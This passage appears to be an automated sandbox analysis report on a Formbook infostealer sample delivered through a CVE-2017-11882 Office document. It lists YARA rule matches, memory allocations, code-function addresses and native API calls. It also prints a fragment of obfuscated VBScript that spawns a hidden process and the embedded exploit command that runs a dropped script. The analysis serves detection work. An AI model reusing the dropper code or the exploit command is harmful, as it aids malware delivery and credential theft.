= strTemp & a..End If..End Function........Sub B0xCRC341414141(CO0xCRC341414141)..Set ProductData0xCRC341414141 = GetObject (SPLevel0xCRC341414141 + "CiMv2")..Set ConvertToKey0xCRC341414141 = ProductData0xCRC341414141.Get (I0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Set KeyOffset0xCRC341414141 = ConvertToKey0xCRC341414141.SpawnInstance_..KeyOffset0xCRC341414141.ShowWindow = 0..Execute("SeT Data0xCRC341414141 = ProductData0xCRC341414141.Get (""WiN32_PrOceSs"")")..Set isWin80xCRC341414141 = Da
Source: ~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp.0.dr	Stream path '_1699986732/Equation Native' : ..................\...[.............ZZCmD.exe /C cscript %tmp%\Client.vbs A..C................................................................................................................

Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00401030	10_2_00401030
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041DA19	10_2_0041DA19
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041E23C	10_2_0041E23C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041EB64	10_2_0041EB64
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041DCEB	10_2_0041DCEB
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00402D90	10_2_00402D90
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041D5A6	10_2_0041D5A6
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00409E60	10_2_00409E60
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041DE6B	10_2_0041DE6B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041EE96	10_2_0041EE96
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041DFEA	10_2_0041DFEA
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00402FB0	10_2_00402FB0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041E7B4	10_2_0041E7B4
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A2E0C6	10_2_00A2E0C6
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A5D005	10_2_00A5D005
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A33040	10_2_00A33040
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A4905A	10_2_00A4905A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A2E2E9	10_2_00A2E2E9
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AD1238	10_2_00AD1238
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AD63BF	10_2_00AD63BF
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A2F3CF	10_2_00A2F3CF
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A563DB	10_2_00A563DB
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A32305	10_2_00A32305
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A7A37B	10_2_00A7A37B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A37353	10_2_00A37353
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A65485	10_2_00A65485
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A41489	10_2_00A41489
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AB443E	10_2_00AB443E
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A6D47D	10_2_00A6D47D
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A4C5F0	10_2_00A4C5F0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A3351F	10_2_00A3351F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A76540	10_2_00A76540
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A34680	10_2_00A34680
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A3E6C1	10_2_00A3E6C1
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AD2622	10_2_00AD2622
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A7A634	10_2_00A7A634
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A3C7BC	10_2_00A3C7BC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AB579A	10_2_00AB579A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A657C3	10_2_00A657C3
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00ACF8EE	10_2_00ACF8EE
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A5286D	10_2_00A5286D
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A3C85C	10_2_00A3C85C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A329B2	10_2_00A329B2
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AD098E	10_2_00AD098E
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A469FE	10_2_00A469FE
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AB394B	10_2_00AB394B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AB5955	10_2_00AB5955
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AE3A83	10_2_00AE3A83
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00ADCBA4	10_2_00ADCBA4
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00ABDBDA	10_2_00ABDBDA
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A2FBD7	10_2_00A2FBD7
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A57B00	10_2_00A57B00
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00ACFDDD	10_2_00ACFDDD
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A60D3B	10_2_00A60D3B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A3CD5B	10_2_00A3CD5B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A62E2F	10_2_00A62E2F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A4EE4C	10_2_00A4EE4C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00ACCFB1	10_2_00ACCFB1
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00AA2FDC	10_2_00AA2FDC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A40F3F	10_2_00A40F3F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A5DF7C	10_2_00A5DF7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02601238	12_2_02601238
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0255E2E9	12_2_0255E2E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02567353	12_2_02567353
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025AA37B	12_2_025AA37B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02562305	12_2_02562305
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025863DB	12_2_025863DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0255F3CF	12_2_0255F3CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_026063BF	12_2_026063BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0257905A	12_2_0257905A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02563040	12_2_02563040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025DD06D	12_2_025DD06D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0258D005	12_2_0258D005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0255E0C6	12_2_0255E0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02602622	12_2_02602622
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025AA634	12_2_025AA634
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0256E6C1	12_2_0256E6C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02564680	12_2_02564680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025957C3	12_2_025957C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025E579A	12_2_025E579A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0256C7BC	12_2_0256C7BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0259D47D	12_2_0259D47D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025E443E	12_2_025E443E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02595485	12_2_02595485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02571489	12_2_02571489
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025A6540	12_2_025A6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0256351F	12_2_0256351F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0257C5F0	12_2_0257C5F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025E05E3	12_2_025E05E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02613A83	12_2_02613A83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02587B00	12_2_02587B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0255FBD7	12_2_0255FBD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025EDBDA	12_2_025EDBDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025E6BCB	12_2_025E6BCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0260CBA4	12_2_0260CBA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0256C85C	12_2_0256C85C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0258286D	12_2_0258286D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025DF8C4	12_2_025DF8C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025FF8EE	12_2_025FF8EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025E5955	12_2_025E5955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025E394B	12_2_025E394B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025769FE	12_2_025769FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025629B2	12_2_025629B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0260098E	12_2_0260098E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0257EE4C	12_2_0257EE4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02592E2F	12_2_02592E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0258DF7C	12_2_0258DF7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02570F3F	12_2_02570F3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025D2FDC	12_2_025D2FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025FCFB1	12_2_025FCFB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0256CD5B	12_2_0256CD5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02590D3B	12_2_02590D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025FFDDD	12_2_025FFDDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000ED5A6	12_2_000ED5A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EE7B4	12_2_000EE7B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EDA19	12_2_000EDA19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EEB64	12_2_000EEB64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EDCEB	12_2_000EDCEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000D2D90	12_2_000D2D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EDE6B	12_2_000EDE6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000D9E60	12_2_000D9E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EEE96	12_2_000EEE96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000D2FB0	12_2_000D2FB0

Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.568094233.0000000006339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.562381137.0000000006339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp, type: DROPPED	Matched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp, type: DROPPED	Matched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html

Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00A2DF5C appears 120 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00A9F970 appears 84 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00A7373B appears 245 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00A73F92 appears 132 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00A2E2A8 appears 38 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0255E2A8 appears 38 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 025A373B appears 245 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0255DF5C appears 123 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 025CF970 appears 84 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 025A3F92 appears 132 times

Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041A360 NtCreateFile,	10_2_0041A360
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041A410 NtReadFile,	10_2_0041A410
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041A490 NtClose,	10_2_0041A490
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041A540 NtAllocateVirtualMemory,	10_2_0041A540
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041A35B NtCreateFile,	10_2_0041A35B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A200C4 NtCreateFile,LdrInitializeThunk,	10_2_00A200C4
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A20078 NtResumeThread,LdrInitializeThunk,	10_2_00A20078
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A20048 NtProtectVirtualMemory,LdrInitializeThunk,	10_2_00A20048
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1F9F0 NtClose,LdrInitializeThunk,	10_2_00A1F9F0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1F900 NtReadFile,LdrInitializeThunk,	10_2_00A1F900
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FAE8 NtQueryInformationProcess,LdrInitializeThunk,	10_2_00A1FAE8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_00A1FAD0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FBB8 NtQueryInformationToken,LdrInitializeThunk,	10_2_00A1FBB8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FB68 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_00A1FB68
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FC90 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_00A1FC90
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FC60 NtMapViewOfSection,LdrInitializeThunk,	10_2_00A1FC60
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FD8C NtDelayExecution,LdrInitializeThunk,	10_2_00A1FD8C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FDC0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_00A1FDC0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FEA0 NtReadVirtualMemory,LdrInitializeThunk,	10_2_00A1FEA0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_00A1FED0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FFB4 NtCreateSection,LdrInitializeThunk,	10_2_00A1FFB4
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A210D0 NtOpenProcessToken,	10_2_00A210D0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A20060 NtQuerySection,	10_2_00A20060
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A201D4 NtSetValueKey,	10_2_00A201D4
